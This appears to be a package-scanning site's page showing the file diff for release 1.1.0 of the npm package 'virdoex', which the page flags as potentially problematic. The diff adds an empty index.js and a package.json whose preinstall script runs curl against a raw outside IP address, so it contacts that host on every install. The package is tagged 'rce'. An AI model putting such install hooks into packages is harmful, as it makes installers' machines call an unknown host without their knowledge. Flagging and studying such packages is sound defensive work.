virdoex 1.1.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of virdoex might be problematic. Click here for more details.
- package/index.js +0 -0
- package/package.json +16 -0
package/index.js
ADDED
File without changes
|
package/package.json
ADDED
@@ -0,0 +1,16 @@
|
|
1
|
+
{
|
2
|
+
"name": "virdoex",
|
3
|
+
"version": "1.1.0",
|
4
|
+
"description": "just for fun",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall" : "curl http://103.216.146.158:8080/"
|
9
|
+
},
|
10
|
+
"keywords": [
|
11
|
+
"rce"
|
12
|
+
],
|
13
|
+
"author": "Deepak",
|
14
|
+
"license": "ISC"
|
15
|
+
}
|
16
|
+
|